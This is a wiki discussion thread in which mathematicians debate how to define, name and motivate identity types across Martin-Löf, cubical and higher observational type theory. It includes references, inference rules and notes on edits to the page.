(arXiv:0709.0248) • CommentRowNumber28. • CommentAuthorUrs • CommentTimeMay 12th 2021 added ISBN and uploaded the pdf for: • Martin Hofmann, Thomas Streicher, The groupoid interpretation of type theory, in: Giovanni Sambin et al. (eds.)
, Twenty-five years of constructive type theory, Proceedings of a congress, Venice, Italy, October 19—21, 1995. Oxford: Clarendon Press. Oxf. Logic Guides. 36, 83-111 (1998). (ISBN:9780198501275, ps, pdf) • CommentRowNumber29. • CommentAuthorUrs • CommentTimeMay 12th 2021 This entry has offered no original references. I have now added pointer to • Per Martin-Löf, Section 1.7 in: An intuitionistic theory of types: predicative part, in: H. E. Rose, J. C. Shepherdson (eds.), Logic Colloquium ’73, Proceedings of the Logic Colloquium, Studies in Logic and the Foundations of Mathematics 80 Pages 73-118, Elsevier 1975 (doi:10.1016/S0049-237X(08)71945-1, CiteSeer) but that (that section 1.7) is hardly satisfactory. What’s a canonical original reference? • CommentRowNumber30. • CommentAuthorUrs • CommentTimeMay 12th 2021 • (edited May 12th 2021) this one shows the rules, but gives no discussion otherwise: • CommentRowNumber31. • CommentAuthorUrs • CommentTimeMay 12th 2021 This one has more: • CommentRowNumber32. • CommentAuthorUrs • CommentTimeMay 13th 2021 • CommentRowNumber33. • CommentAuthorGuest • CommentTimeJan 26th 2022 Whenever editing is re-enabled a link to cocylinder should be placed in the Related concepts section. • CommentRowNumber34. • CommentAuthorGuest • CommentTimeMay 21st 2022 This article only focuses upon the identity types that appear in Martin-Löf type theory. So what do we do about all the other inequivalent identity types in other type theories, such as the identity types in cubical type theory defined using a primitive interval, and the identity types in higher observational type theory? • CommentRowNumber35. • CommentAuthorUrs • CommentTimeMay 21st 2022 You need to ask what a reader deserves to see when looking for information and happening upon a page with a given title. I suppose that a reader looking to understand what is meant by “identity type” will want to be shown all possible meanings. 
So if there are more than are currently discussed on the page, then the page deserves to be re-organized/expanded. 3. started brief section on identity types in higher observational type theory; somebody with a better understanding of the subject, like Mike Shulman, could expand on it further Anonymous • CommentRowNumber37. • CommentAuthorGuest • CommentTimeAug 6th 2022 path type redirects here, but in the cubical type theory literature, path types are different from identity types in that most of them do not satisfy the J rule definitionally, but only up to a path. • CommentRowNumber38. • CommentAuthorGuest • CommentTimeSep 2nd 2022 created path type article. propositional equality redirects here as well, but should be created and made into a disambiguation article with links to both identity type and path type. • CommentRowNumber39. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 • (edited Sep 3rd 2022) I would actually prefer that the phrase “identity type” be usable for whatever notion is appropriate for the particular type theory. This includes the Martin-Löf identity type (a.k.a. “jdentity type”), the path type of cubical type theories, and the identity type of higher observational type theory, all of which satisfy different formal rules but are still “types of identifications”. • CommentRowNumber40. • CommentAuthorGuest • CommentTimeSep 3rd 2022 Andrew Swan thinks differently in this article: We give a collection of results regarding path types, identity types and univalent universes in certain models of type theory based on presheaves. The main result is that path types cannot be used directly as identity types in any Orton-Pitts style model of univalent type theory with propositional truncation in presheaf assemblies over the first and second Kleene algebras.
We also give a Brouwerian counterexample showing that there is no constructive proof that there is an Orton-Pitts model of type theory in presheaves when the universe is based on a standard construction due to Hofmann and Streicher, and path types are identity types. A similar proof shows that path types are not identity types in internal presheaves in realizability toposes as long as a certain universe can be extended to a univalent one. We show that one of our key lemmas has a purely syntactic variant in intensional type theory and use it to make some minor but curious observations on the behaviour of cofibrations in syntactic categories. • CommentRowNumber41. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 Yes, I’m aware that cubical type theorists tend to use “identity type” to mean the Martin-Lof one. (Although in cubical type theory there is also a “Swan identity type” that’s different from both path types and ML identity types.) I’m saying I would rather advocate a different usage. Some cubical type theorists have taken to calling the ML identity type the “jdentity type”, since its defining feature is the J rule. • CommentRowNumber42. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 As evidence supporting my preference, let me point out that the phrase “identity type” is already used in both intensional type theory and extensional type theory, even though the identity types of those two theories satisfy different rules. • CommentRowNumber43. 
• CommentAuthorGuest • CommentTimeSep 3rd 2022 Many cubical type theorists make the distinction between identity types like Martin-Löf’s identity types, Swan’s identity types, and the higher observational type theory identity types, where the rules for the identity types all imply the definitional J rule as a theorem (and they call all 3 types ’identity types’), vs the cubical path types where the rules only imply the J rule up to a path, and additional regularity rules are needed to make the J rule definitionally valid. No additional regularity rule has been found to be compatible with univalence in cubical type theories yet. • CommentRowNumber44. • CommentAuthorDavid_Corfield • CommentTimeSep 3rd 2022 Can we do better than this? Identity types in cubical type theory are called path types and are defined using a primitive interval. I’m not exactly sure how they work so somebody with more expertise with cubical type theory should expand on it. • CommentRowNumber45. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 The identity types of higher observational type theory also do not satisfy definitional computation for J. • CommentRowNumber46. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 Also, if someone wants to do mathematics “agnostically” in higher type theory, so that what they write could be interpreted equally well in Book HoTT, cubical type theory, or higher observational type theory, they can do that technically by assuming just an “identity type” with a propositional J-rule. But they then have to call that type something, and I don’t know what they could call it other than an “identity type”. • CommentRowNumber47. 
• CommentAuthorGuest • CommentTimeSep 3rd 2022 @Guest at 43 Cubical type theorists make the distinction between path types and identity types because path types are literally functions out of an interval, just like how paths in Euclidean space are functions out of the unit interval, not because of the definitional/propositional J distinction. Otherwise, why are the types in XTT called “path types” instead of “identity types”? They satisfy definitional J by coercion and regularity. Nathan • CommentRowNumber48. • CommentAuthorGuest • CommentTimeSep 3rd 2022 @Mike Shulman at 46 The definitional/propositional J could be distinguished by calling the identity type with definitional J a “strict identity type” and the identity type with propositional J a “weak identity type”. Type theory already uses “strict” and “weak” terminology for other such objects: compare “strict Tarski universe” vs “weak Tarski universe”, “strict proposition” and “weak proposition”, “strict squash type” and “weak squash type”, et cetera, where the difference between the structures is that the “strict” versions use definitional equality while the “weak” versions use propositional equality. Nathan • CommentRowNumber49. • CommentAuthorGuest • CommentTimeSep 3rd 2022 Nathan, if one includes the interval type in MLTT then identity types between objects of a type are also functions out of the interval to the type. But identity types in homotopy type theory (or any model of MLTT with the interval type) are not usually called “path types”. So that doesn’t explain why path types are called path types in cubical type theory. • CommentRowNumber50. • CommentAuthorGuest • CommentTimeSep 4th 2022 The definitional J rule implies the propositional J rule, but the converse doesn’t hold, so one should take the propositional J rule to be the defining characteristic of identity types, as it holds for all known identity types, not just the Martin-Löf identity types.
This is similar to the case for W-types and higher inductive types, where the computation rules hold only up to a path, rather than involving definitional equality. • CommentRowNumber51. • CommentAuthorGuest • CommentTimeSep 4th 2022 The real problem with path types in cubical type theory is that technically they aren’t identity types, they are dependent identity types, in the same way a dependent function type is not a function type, and so they should actually be described in the article on dependent identity types rather than in this article. • CommentRowNumber52. • CommentAuthorGuest • CommentTimeSep 4th 2022 @50 What do you mean by “propositional J rule”? Suppose one has a cubical higher observational type theory with Swan’s identity types; there are 3 separate identity types $\mathrm{idHOTT}$, $\mathrm{idSwan}$, and $\mathrm{Path}$. From there one could define 4 separate propositional computation rules (the elimination rule being the same for all 4) for the Martin-Löf identity types, resulting in 4 separate identity types $\mathrm{idML}0$, $\mathrm{idML}1$, $\mathrm{idML}2$, $\mathrm{idML}3$:
$\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}0_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{idML}0_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$
$\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}1_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{idHOTT}_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$
$\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}2_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{idSwan}_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$
$\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}3_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{Path}_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$
4. added some more details about identity types in cubical type theory, mentioning both the dependent identity type called the path type and the non-dependent identity type by Andrew Swan Anonymous • CommentRowNumber54. • CommentAuthorGuest • CommentTimeSep 4th 2022 dependent path types in cubical type theory are not dependent identity types, because the interval primitive $I$ is not a type! That is another reason why path types in cubical type theory should be considered different from identity types. • CommentRowNumber55. • CommentAuthorMike Shulman • CommentTimeSep 4th 2022 This discussion would be a lot easier to follow if everyone would sign their comments with a name. Pseudonyms would be fine, just something so we can distinguish between all the Guests and Anonymice. Please?!? Re 48: I suppose, although I would prefer the meaning of “identity type” to be theory-dependent. In HOTT I wouldn’t want to have to always say “weak identity type” rather than just “identity type”. Re 49: Not by definition. Book HoTT doesn’t have a notion of “extension type” that one could use to define a notion of “path type” out of the interval with fixed endpoints. So even though in some imprecise sense, identifications in Book HoTT are “equivalent to” functions out of the interval type, they’re not defined to be such the way they are in cubical type theories. Re 51: The general form of path-types is a dependent identity type, but they specialize to non-dependent identity types in the case of constant dependence or reflexivity in the base. So they are identity types, and more. The identity types of HOTT also behave like this. Re 52: But because any weak identity type is equivalent to any other, all of those propositional computation rules are inter-derivable. So the difference doesn’t really matter. Re 54: What do you mean? The interval is not a type, but the path types are types! • CommentRowNumber56.
• CommentAuthorsteveawodey • CommentTimeSep 4th 2022 I agree that the various identity/path/identification/equality types are all “identity types” in a general sense and can usefully be discussed and distinguished in the same place. 5. added a brief list of the kinds of identity types to the introduction section, and also an explanation of what distinguishes identity types from other type families and an explanation of the two different J-rules. Anonymous 6. adding paragraph to explain the difference between dependent and non-dependent identity types Anonymous 7. There exist intensional type theories in which there is no notion of definitional equality, and so the only possible notion of identification elimination in such a theory is the one which uses the identity type for equality. Benno van den Berg and Martijn den Besten came up with such a type theory: • CommentRowNumber60. • CommentAuthorMike Shulman • CommentTimeSep 6th 2022 Clarified the paragraph about dependent identity types a bit. • CommentRowNumber61. • CommentAuthorMike Shulman • CommentTimeSep 6th 2022 Although I’m not sure that this much detail about dependent identity types is appropriate in the “Idea” section. Maybe it should appear further down. • CommentRowNumber62. • CommentAuthorGuest • CommentTimeSep 9th 2022 What does the semicolon mean in the judgment $J(t;x,y,p):C(x,y,p)$? • CommentRowNumber63. • CommentAuthorMike Shulman • CommentTimeSep 10th 2022 It’s just a way of separating the first argument of $J$ from the last three. Optional. • CommentRowNumber64. • CommentAuthorUrs • CommentTimeSep 23rd 2022 I am removing the following redirects and copying them instead into the entry transport: [[!redirects principle of substitution]] [[!redirects principle of substitution of equals for equals]] [[!redirects principle of substituting equals for equals]] • CommentRowNumber65.
• CommentAuthorUrs • CommentTimeSep 25th 2022 • (edited Sep 25th 2022) I am going to add to this page a semi-formal explanation of Id-types that has a chance of being intelligible to intelligent outsiders. The strategy would be to recall from the forefathers that identifications satisfy three rules: 1. everything is canonically identified with itself; 2. identified things are indiscernible; 3. identifications have reverses. and then to observe that the evident operational/constructive formulation of these three items is, in this order, nothing but: 1. $Id$-intro 2. transport 3. $Id$-uniqueness principle and finally to conclude with proving that • (2) and (3) $\;\;\Leftrightarrow\;\;$ J-rule. This is, of course, essentially the (meta-)logic proposed by Ladyman & Presnell 2015, minus some verbosity. I admit that I only recently looked at their article in detail, for the first time, and took note of their actual point. Now I am struck by how relevant this is. The (straightforward but not completely trivial) formal proofs for the last step are also spelled out in the Bachelor thesis Götz 2018. This leads to an evident bibliographic question: Is it the case that the literature making explicit the above foundational point of HoTT consists of one Philosophy-article and one Bachelor thesis? I suppose experts will feel this is all well-known, but before I write an exposition into the nLab entry: Are there other references making this explicit? • CommentRowNumber66. • CommentAuthorUrs • CommentTimeSep 25th 2022 An early version of the kind of motivation/overview/explanation that I want to add is now here: MetaLogicOfIdentifications-220925.jpg. Will further fine-tune tomorrow. • CommentRowNumber67. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 Well, L&P say clearly in the beginning of section 6: It is known to type theorists that the two principles discussed below entail path induction – see, for example, [12, pp. 23-29], but as far as we are aware they do not put this fact to use in the way we do here. [12] is Thierry Coquand, Equality and Dependent Type Theory, a talk given for the 24th AILA meeting, Bologna, February 2011. This fact is also the way that the J-rule is proven from the other primitives in cubical type theory and in H.O.T.T. In general, I’m not hugely impressed with that L&P paper. It seems to me that if you’re willing to accept equality in a based path space as the correct notion of “uniqueness” for Id-types, there’s nothing preventing you from similarly accepting the based J-rule as justified by a claim that “all identifications are refl” (which they reject) in exactly the same sense that equality in a based path space is the proper sort of uniqueness. I’m also not convinced that Id-uniqueness corresponds to “reverses”. It’s true that one of the two possible orientations of Id-uniqueness involves in particular a path in the opposite direction (although the other possible orientation does not). But even then, there’s still something nontrivial going on in identifying the obvious equality $p \bullet p^{-1} = refl$ with the necessary equality in a Sigma-type. Indeed, I have no idea how to prove that those two equalities are equivalent without already using the J-rule or something equivalent to it. • CommentRowNumber68. • CommentAuthorUrs • CommentTimeSep 26th 2022 “in exactly the same sense” That’s the point: but it makes it explicit and disentangles it from the transport aspect. In contrast, what trips newcomers up when they are first shown the J-rule is that, first, it comes as a surprise to consider dependency on identifications in a fundamental axiom; and, second, that it remains mysterious how those identifications-of-identifications work. Both of these puzzles are clarified by decomposing J as Transport plus Reversal. And if, as you say, “This fact is also the way that the J-rule is proven from the other primitives in cubical type theory and in H.O.T.T.”, then
it seems worthwhile even beyond the pedagogic aspect. Regarding: Thierry Coquand. Equality and Dependent Type Theory Thanks for the pointer! I had missed that. So in addition to one Phil-article and one Bachelor thesis there is one slide! I will add these pointers to the entry now, with commentary. • CommentRowNumber69. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 As I said, I don’t believe that Id-uniqueness is correctly described as “reversal”. I can see a pedagogical point to derive J from Id-uniqueness (as well as its practical uses). I was just saying that I don’t think it changes the philosophical situation any. • CommentRowNumber70. • CommentAuthorUrs • CommentTimeSep 26th 2022 I heard you say it, but don’t know what you mean, it sounds counterfactual. • CommentRowNumber71. • CommentAuthorDavid_Corfield • CommentTimeSep 26th 2022 I’m struggling to see what’s at stake here. • Is the objection to L&P in #67 that they’re looking to derive the J-rule from other assumptions, but to show this derivation fully they would need to rely on the J-rule? And in any case, the kinds of reasoning to justify these other assumptions are of the same kind that would justify the J-rule straight off? • Is there a difference between book HoTT and cubical type theory or H.O.T.T. in this regard? • What is the “philosophical situation” (#69)? • CommentRowNumber73. • CommentAuthorUrs • CommentTimeSep 26th 2022 re #71: The entry identity type currently does a terrible job at explaining its subject to an audience not yet familiar with it. I’ll write an intelligible Idea-section, using exposition as shown #66. Still busy with something else, though. • CommentRowNumber74.
• CommentAuthorDavid_Corfield • CommentTimeSep 26th 2022 I certainly agree that the current state of the page is bad. And one might hope for there to be some account which both is excellent pedagogically and gets at the essence of the concept. Does the need to do this simultaneously for all type theories present a problem? • CommentRowNumber75. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 Is the objection to L&P in #67 that they’re looking to derive the J-rule from other assumptions, but to show this derivation fully they would need to rely on the J-rule? And in any case, the kinds of reasoning to justify these other assumptions are of the same kind that would justify the J-rule straight off? More the latter. They don’t call Id-elimination “reversal”, which is where I think you already need to have the J-rule. Is there a difference between book HoTT and cubical type theory or H.O.T.T. in this regard? I believe so. CTT and HOTT don’t take the J-rule as primitive, so the problem of justifying their rules is a different one. What is the “philosophical situation” (#69)? A reference back to #67. • CommentRowNumber76. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 Urs, I don’t know what you mean by “it sounds counterfactual”. I’m saying that the version of Id-uniqueness that you need in order to derive J does not coincide with any intuitive statement of “reversal”, unless you already have the J-rule to prove them equivalent. • CommentRowNumber77. • CommentAuthorGuest • CommentTimeSep 26th 2022 The only difference w/regards to the J-rule between the identity/path types in cubical type theory and higher observational type theory and the identity types as usually presented in Martin-Löf type theory is that in cubical/higher observational, the computation rule uses an identity type while in Martin-Löf the computation rule uses definitional equality. 
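The Martin-Löf side of this comparison can be observed directly in Lean 4, whose built-in `Eq` is a Martin-Löf-style identity type (the names `J` and the example below are ours, not from the thread):

```lean
universe u v

-- J, defined from Lean's primitive eliminator for `Eq`
def J {α : Sort u} {x : α} (C : (y : α) → x = y → Sort v)
    (c : C x rfl) {y : α} (p : x = y) : C y p :=
  Eq.rec (motive := C) c p

-- Martin-Löf-style computation rule: `J` applied to `rfl` reduces
-- definitionally to the given term, so plain `rfl` proves the equation
example {α : Sort u} {x : α} (C : (y : α) → x = y → Sort v) (c : C x rfl) :
    J C c rfl = c :=
  rfl
```

In a cubical-style system the corresponding equation for J would hold only propositionally, i.e. as an inhabitant of an identity type rather than by `rfl`.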
With transport, the situation is reversed: in cubical/higher observational, transport uses definitional equality, while Martin-Löf uses an identity type. However, definitional equality isn’t really relevant here: definitional equality of two elements implies having a term of the identity type between two elements; i.e. the definitional computation rules of Martin-Löf identity types imply the propositional computation rule, and the definitional transport rules of cubical/higher observational’s identity/path types imply the propositional transport rules. As a result, one could replace both instances of definitional equality with propositional equality in the definition of an identity type, and the resulting definition will apply to more type theories, including those like objective type theory mentioned above in comment 59, which lack definitional equality entirely. • CommentRowNumber78. • CommentAuthorGuest • CommentTimeSep 26th 2022 David Corfield wrote Is there a difference between book HoTT and cubical type theory or H.O.T.T. in this regard? Yes. Book HoTT’s identity types are by default homogeneous identity types, while both cubical type theory’s path types and H.O.T.T.’s identity types are heterogeneous identity types. The motivation for making homogeneous identity types the default and constructing heterogeneous identity types out of homogeneous identity types is likely different from the motivation for making heterogeneous identity types the default and constructing homogeneous identity types out of heterogeneous identity types. Scott Morris • CommentRowNumber79.
• CommentAuthorUrs • CommentTimeSep 26th 2022 the version of Id-uniqueness that you need in order to derive J does not coincide with any intuitive statement of “reversal” The intuitive picture is this: $\array{ && x \\ & \mathllap{{}^{\text{some identification}}}\swarrow &\Rightarrow& \searrow{}^{\mathrlap{\text{trivial identification}}} \\ y && \underset{\mathclap{\text{reverse identification}}}{\xrightarrow{\phantom{---------}}} && x }$ • CommentRowNumber80. • CommentAuthorGuest • CommentTimeSep 26th 2022 @79 Whether the default identity type in the type theory is heterogeneous or homogeneous is irrelevant to this discussion; I think the fact that we have a separate article for dependent identity type strongly indicates that this article is about the homogeneous/non-dependent identity types. And non-dependent identity types have certain properties which hold universally across type theories, regardless of whether the non-dependent identity types are primitive in the theory or derived from some other type family: the propositional J-rule, propositional transport, reflexivity, and the fact that their categorical semantics is a path space object. So we could and should motivate general identity types by these properties, which hold for all definitions of non-dependent identity types. • CommentRowNumber81. • CommentAuthorGuest • CommentTimeSep 26th 2022 sorry I meant @78 not @79 • CommentRowNumber82. • CommentAuthorGuest • CommentTimeSep 26th 2022 There are also Swan identity types. What is the motivation behind those identity types, and how is that different from the motivation behind Martin-Löf identity types? • CommentRowNumber83. • CommentAuthorUrs • CommentTimeSep 27th 2022 Oh, I see. I guess you mean that we need the identification-of-identifications in the other direction. In which case it expresses that identifications may be composed with self-identifications. In fact that’s closer to what Leibniz actually says – for what it’s worth.
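The 2-cell in the diagram of #79, and the caveat from #67 that exhibiting it already uses J, can be made concrete in a proof assistant. Lean 4’s own `Eq` lives in `Prop` with proof irrelevance, which trivializes identifications-of-identifications, so this sketch uses a hand-rolled `Type`-valued identity type (all names below are ours):

```lean
universe u

-- a Type-valued identity type, as in HoTT
inductive Path {α : Type u} : α → α → Type u
  | refl (a : α) : Path a a

-- reverses of identifications
def Path.symm {α : Type u} {x y : α} : Path x y → Path y x
  | .refl a => .refl a

-- composition of identifications
def Path.trans {α : Type u} {x y z : α} : Path x y → Path y z → Path x z
  | .refl _, q => q

-- the 2-cell of the diagram: the reverse of p composed with p is
-- identified with the trivial identification at y; note that the
-- proof has to pattern-match on p, i.e. it already appeals to J
def reverseCell {α : Type u} {x y : α} (p : Path x y) :
    Path (p.symm.trans p) (Path.refl y) :=
  match p with
  | .refl a => .refl (Path.refl a)
```

The `match` here is sugar for `Path.rec`, which is exactly the J-rule: the evident-looking 2-cell is not available before J.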
• CommentRowNumber84. • CommentAuthorUrs • CommentTimeSep 27th 2022 • (edited Sep 27th 2022) I have now re-written the Idea-section of the entry (starting here). The main new part is the sub-section “Idea – ML identity types” (now here) which means to introduce the reader to what’s going on in a more generally intelligible way. (The previous statement of the J-rule was a bit like showing ASCII art after removing all its whitespace characters. That statement is still kept in the Definition-section, where it used to be. But if we had more energy, this would deserve to be typeset more readably, too.) I have tried to keep all material previously in the Idea-section, after re-arranging it slightly. That old material, subject to little adjustments, is now in brief sub-sections “Idea – Cubical identity types” (here) and “Idea – Strict identity types” (here). There is still much room to improve these further. • CommentRowNumber85. • CommentAuthorDavid_Corfield • CommentTimeSep 27th 2022 Should we have something on this page on identity types and adjunctions? I remember this paper as arguing against the justification in Ladyman & Presnell 2015, and in favour of one by adjoints: • Patrick Walsh, Categorical harmony and path induction, Review of Symbolic Logic 10(2): 301-321 (2017) (pdf) See in particular p. 20. His own justification is on p. 18 1. Identity is a concept determined by adjoint and so has a meaning-bearing inferential role, being categorically harmonious; 2. The inferential role of identity in these hyperdoctrines indeed provides a justification for path induction. He notes The proof that path induction is derivable from the definition of identity in a hyperdoctrine can be found in the appendix to [35]. The proof there is due to Steve Awodey. [35] is his masters thesis. • CommentRowNumber86. • CommentAuthorDavid_Corfield • CommentTimeSep 27th 2022 Another criticism of L&P’s justification of path induction comes in • Ansten Klev, (2019a). 
The justification of identity elimination in Martin-Löf’s type theory. Topoi, 38, 577–590. (doi:10.1007/s11245-017-9509-1) The justification of Id-elimination suggested by Ladyman and Presnell (2015, p.401ff.) consists in treating (Ind) and (Uniq) as primitive principles of type theory and showing how Id-elimination may be derived on that basis. It is not clear to me what is gained by this approach. Although the postulation of (Ind) and (Uniq) allows one to derive Id-elimination, these postulations themselves of course have to be justified. His own justification comes from Martin-Löf’s meaning explanation. More by him on justifying the identity elimination rule here: • CommentRowNumber87. • CommentAuthorUrs • CommentTimeSep 27th 2022 arguing against It really is self-evident – I bet you could check this on lay people and kids in your vicinity: Given an identification $x \xrightarrow{\; p \;} y$, there is an evident identification-of-identifications between $id_x \circ p$ and $p$. The forefathers would have stated this, had they only thought about identifications being constructions instead of just properties. But a contemporary kid who knows what a computer is will know that a computer decrypting an email and one decrypting that email and then doing nothing have performed the same task. • CommentRowNumber88. • CommentAuthorUrs • CommentTimeSep 27th 2022 I have the impression that the names of Ladyman and Presnell keep derailing the discussion unnecessarily. We saw above that their idea is due to Coquand and is at the heart of modern HoTT-provers – that should be sufficient proof by authority that this is worthwhile, if that is necessary and if we cannot agree on what is “pre-mathematically self-evident”. But mainly – and this is what got me here before I even reminded myself of Ladyman and Presnell’s – it seems clearly helpful for appreciating the J-rule to realize that it is transport along the evident paths-of-paths. 
I find it puzzling that such an obvious and obviously helpful remark leads to debate. Every introduction to HoTT ought to say this. Anyway, I have now made the edits to the entry that I had announced in #65. I feel like this drastically improves on the expository use of the entry. I can try to make further tweaks where it helps the exposition, otherwise I will bow out of the debate. • CommentRowNumber89. • CommentAuthorDavid_Corfield • CommentTimeSep 27th 2022 • (edited Sep 27th 2022) Typo: in the box in IIb, above the ’w’ of ’with the self-identification’, it should be $x'$ rather than $x$. It really is self-evident Walsh just says How are we to justify, without mathematical knowledge, the claim that identity types should be inhabited by terms identical to the trivial identification up to propositional identity over $E_a$? Although I think this is patently not pre-mathematical, I will not dwell on the point here. Where you write Given an identification $x \xrightarrow{\; p \;} y$, there is an evident identification-of-identifications between $id_x \circ p$ and $p$, isn’t it Mike’s point above (#67) that the passage from an obvious composition of identities (as in yours here) to an equality in a Sigma-type (which is what you need) is not obvious: there’s still something nontrivial going on in identifying the obvious equality $p \bullet p^{-1} = refl$ with the necessary equality in a Sigma-type. I guess in your case he’s asking how $\bar{p}_{\ast}$ is constructed. • CommentRowNumber90. • CommentAuthorGuest • CommentTimeSep 27th 2022 Is equality in classical mathematics definitional equality? I was under the impression that it was a form of propositional equality, since material set theory over first order logic is a simple type theory which consists of a type $Set$ or $V$ of sets and a type $Prop$ of propositions, and equality is defined as an equivalence relation on sets which is a binary predicate valued in propositions. • CommentRowNumber91. 
• CommentAuthorGuest • CommentTimeSep 27th 2022 @90 That is one presentation of material set theory over first order logic, and not the most usual presentation of material set theory over first order logic in type theory. In the usual presentation of material set theory over first order logic, one judges $A \; \mathrm{prop}$ directly, rather than judge $\mathrm{Prop} \; \mathrm{type}$ and $A:\mathrm{Prop}$. Similarly, one judges $B \; \mathrm{set}$ directly, rather than judge $\mathrm{Set} \; \mathrm{type}$ and $B:\mathrm{Set}$. In this regard, it is very similar to a system like simplicial type theory or cubical type theory, where there are different levels for the propositional logic or face formulas and the set theory or type theory. • CommentRowNumber92. • CommentAuthorGuest • CommentTimeSep 27th 2022 But regardless, one would still say that given two sets $A$ and $B$, equality $A = B$ is judged to be a proposition. In homotopy type theory, one sees the same thing with universes and type judgments. One often works with Russell universes, where every type is judged to be a member of a universe type like $A : \mathcal{U}_i$, where $i$ is a natural number representing the universe level. But one could equally work with Coquand type judgments, where one has a hierarchy of type judgments $A \; \mathrm{type}_i$ rather than a hierarchy of universes $A : \mathcal{U}_i$. So I don’t see how switching between judgments and universes/type of sets/type of propositions changes anything substantial semantically, whether it be for homotopy type theory or for set theory over first order logic. • CommentRowNumber93. • CommentAuthorUrs • CommentTimeSep 28th 2022 • (edited Sep 28th 2022) re: #89: The typo in the box in (IIb) I have fixed now, thanks for catching this! Also, I have added the previously missing computation rule to the box for (IIa). in your case he’s asking how $\bar{p}_{\ast}$ is constructed.
But it’s clearly not “constructed”: It’s the “meaning explanation” of what the uniqueness axiom bluntly asserts! I have recalled the illustration in #79 (and for the reverse direction in the entry here). If anyone is lacking the “pre-mathematical” intuition to read this diagram (?), they can regard it as literally being the 2-simplex which models the corresponding path-of-paths in the simplicial model. (I have now added a corresponding comment to the entry, here, if it helps.) $\,$ re: #90: Thanks for catching this, that was my bad. You were referring to the words “definitional equality” in the second paragraph here, and I have deleted these two words now. • CommentRowNumber94. • CommentAuthorUrs • CommentTimeSep 28th 2022 have added (here) also a box for path lifting • CommentRowNumber95. • CommentAuthorDavid_Corfield • CommentTimeSep 28th 2022 • (edited Sep 28th 2022) But it’s clearly not “constructed”: It’s the “meaning explanation” of what the uniqueness axiom bluntly asserts! So I guess two wings (of the computational trilogy/trinity) are objecting to that axiomatic assertion. Klev (acknowledging Sundholm and Martin-Löf) in the first paper in #86 provides what he takes to be the meaning explanation for the J-rule, arguing that it fits in with the typical ML approach to type formation. By contrast, The approach suggested by Ladyman and Presnell moreover breaks the general pattern in type theory of furnishing set-forming operators with introduction- and elimination rules, since the Id-elimination rule is now replaced by two postulates that cannot be regarded as elimination rules. It seems to me a great insight, first developed in Martin-Löf (1971), that propositional identity can be treated by means of such rules. 
For him, postulation of the uniqueness axiom is no better justified than other proposals, such as UIP, for Id-types (is that what Mike is saying in #67?), not the right kind of justification he sees as possible for the J-rule (as he gives in section 4). Then Walsh (acknowledging Awodey) takes his departure from the universal constructions of category-theoretic adjunctions. Presumably as a positive type, the Id-introduction and elimination rules just fall out as usual as the unit of the corresponding monad/Hom isomorphism (as here). Why, from a category-theoretic point of view, would one expect further analysis of what is the expression of a left universal property to be illuminating? Do we ever do that for other universal constructions? So both parties want Intro/Elim as basic, but for different reasons (or maybe not so different). The type theorists because this is how to give proper meaning explanations, and the category theorist because this is how to express universal constructions. • CommentRowNumber96. • CommentAuthorUrs • CommentTimeSep 28th 2022 I promised to bow out of this kind of discussion. (E.g. I find it weird to cite people not for their insight but for their insistence on not understanding something! ;-o) But I’ll offer this, for comparison: Here at math.SE:q/4379724 is exhibited the typical puzzlement that newcomers have with the J-rule – there are two parts to the puzzlement: 1. why consider a dependency on identifications in the first place, and 2. how is it that identifications all relate to the trivial one? The top reply math.SE:a/4379766 starts with a verbose part It’s tricky… It’s extremely surprising …. struggled with this … but eventually, in its last paragraph, it gives the explanation: by pointing out that one is evaluating transport on the paths that contract the based path space. This is what addresses both points of the puzzlement.
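That explanation can be transcribed into Lean 4 as a sketch (all names below are ours): the J-rule is transport along the contraction of the based path space; and, as #67 observed, establishing that contraction is itself an appeal to J.

```lean
universe u v

-- transport: identified points of the base have identified fibers
def transport {α : Sort u} (P : α → Sort v) {a b : α} (p : a = b) :
    P a → P b :=
  fun h => p ▸ h

-- the based path space at x
abbrev Based (α : Sort u) (x : α) :=
  Σ' y : α, x = y

-- the contraction: every based path (y, p) equals the trivial one;
-- `cases p` invokes the eliminator of `Eq`, i.e. J itself
def contract {α : Sort u} {x y : α} (p : x = y) :
    (⟨x, rfl⟩ : Based α x) = ⟨y, p⟩ := by
  cases p
  rfl

-- given the contraction, the J-rule is literally transport along it
def J' {α : Sort u} {x : α} (C : (y : α) → x = y → Sort v) (c : C x rfl)
    {y : α} (p : x = y) : C y p :=
  transport (fun w : Based α x => C w.fst w.snd) (contract p) c
```

The two puzzlement points line up with the two definitions: dependency on identifications is just a family over the based path space, and the mysterious identifications-of-identifications are the paths of the contraction.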
